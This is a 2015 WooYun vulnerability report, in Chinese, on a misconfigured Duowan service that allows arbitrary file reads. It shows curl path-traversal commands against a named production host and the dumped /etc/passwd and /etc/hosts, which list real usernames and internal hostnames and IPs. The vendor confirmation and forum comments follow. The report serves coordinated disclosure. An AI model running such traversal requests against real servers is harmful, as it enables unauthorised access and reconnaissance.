当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092097

漏洞标题:多玩某服务配置不当导致任意系统文件读取

相关厂商:广州多玩

漏洞作者: boooooom

提交时间:2015-01-15 19:39

修复时间:2015-03-01 19:40

公开时间:2015-03-01 19:40

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-01: 细节向公众公开

简要描述:

RT

详细说明:

[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:103:106::/var/lib/snmp:/bin/false
yuwanfu:x:1001:1003::/home/yuwanfu:/bin/bash
wuhaiting:x:1012:1014::/home/wuhaiting:/bin/bash
user_00:x:1019:1021::/home/user_00:/bin/bash
dspeak:x:1020:1022::/home/dspeak:/usr/sbin/nologin
xiaoshengwen:x:2592:2592::/home/xiaoshengwen:/bin/bash
sunjianpeng:x:2605:2605::/home/sunjianpeng:/bin/bash
liumeijun:x:2659:2659::/home/liumeijun:/bin/bash
lijie1:x:2744:2744::/home/lijie1:/bin/bash
liangguanhui:x:2063:2063::/home/liangguanhui:/bin/bash
liuyixing:x:2832:2832::/home/liuyixing:/bin/bash
zenglei:x:2723:2723::/home/zenglei:/bin/bash
zhoumingliang:x:2735:2735::/home/zhoumingliang:/bin/bash
linxiaohu:x:2083:2083::/home/linxiaohu:/bin/bash
liushoukai:x:2902:2902::/home/liushoukai:/bin/bash
[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/hosts
127.0.0.1   localhost
127.0.1.1   ubuntu
106.38.198.9 manager.repos.yy.duowan.com
121.14.37.147  balance.yy.duowan.com
220.181.86.207  sdaemon.yy.duowan.com
121.14.37.153 sdaemon2.yy.duowan.com
121.14.37.153 rdaemon.yy.duowan.com
220.181.86.207 rdaemon2.yy.duowan.com
119.147.160.90 yycookie.yy.duowan.com
58.215.46.21   mirror.yy.duowan.com
121.14.37.153   config.yy.duowan.com
121.14.43.142	oams.yy.duowan.com
221.228.79.31	bc.yy.duowan.com
221.228.79.32	bc2.yy.duowan.com
106.38.255.130	oams2.yy.duowan.com

漏洞证明:

[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
snmp:x:103:106::/var/lib/snmp:/bin/false
yuwanfu:x:1001:1003::/home/yuwanfu:/bin/bash
wuhaiting:x:1012:1014::/home/wuhaiting:/bin/bash
user_00:x:1019:1021::/home/user_00:/bin/bash
dspeak:x:1020:1022::/home/dspeak:/usr/sbin/nologin
xiaoshengwen:x:2592:2592::/home/xiaoshengwen:/bin/bash
sunjianpeng:x:2605:2605::/home/sunjianpeng:/bin/bash
liumeijun:x:2659:2659::/home/liumeijun:/bin/bash
lijie1:x:2744:2744::/home/lijie1:/bin/bash
liangguanhui:x:2063:2063::/home/liangguanhui:/bin/bash
liuyixing:x:2832:2832::/home/liuyixing:/bin/bash
zenglei:x:2723:2723::/home/zenglei:/bin/bash
zhoumingliang:x:2735:2735::/home/zhoumingliang:/bin/bash
linxiaohu:x:2083:2083::/home/linxiaohu:/bin/bash
liushoukai:x:2902:2902::/home/liushoukai:/bin/bash
[root@localhost ~]# curl yxtq.duowan.com:8080/../../../../../../../../../../../../../../../../../etc/hosts
127.0.0.1   localhost
127.0.1.1   ubuntu
106.38.198.9 manager.repos.yy.duowan.com
121.14.37.147  balance.yy.duowan.com
220.181.86.207  sdaemon.yy.duowan.com
121.14.37.153 sdaemon2.yy.duowan.com
121.14.37.153 rdaemon.yy.duowan.com
220.181.86.207 rdaemon2.yy.duowan.com
119.147.160.90 yycookie.yy.duowan.com
58.215.46.21   mirror.yy.duowan.com
121.14.37.153   config.yy.duowan.com
121.14.43.142	oams.yy.duowan.com
221.228.79.31	bc.yy.duowan.com
221.228.79.32	bc2.yy.duowan.com
106.38.255.130	oams2.yy.duowan.com

修复方案:

修改配置

版权声明:转载请注明来源 boooooom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-01-16 15:02

厂商回复:

非常感谢对于欢聚时代安全工作的支持,我们会尽快修复!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-15 20:05 | s0mun5 认证白帽子 ( 普通白帽子 | Rank:493 漏洞数:24 | .)

    我要收你插件费

  2. 2015-01-15 20:06 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    从年终奖里扣就行

  3. 2015-01-15 20:06 | boooooom 认证白帽子 ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)

    @s0mun5

  4. 2015-01-15 20:31 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    http://zone.wooyun.org/content/17131还是这个吗

  5. 2015-01-16 15:25 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    膜拜大神啊

  6. 2015-01-29 16:04 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    求插件

  7. 2015-03-01 20:00 | 一天到晚吃 ( 实习白帽子 | Rank:58 漏洞数:23 | 好好看,好好学 test12xx)

    为何这个洞能在前台显示,不服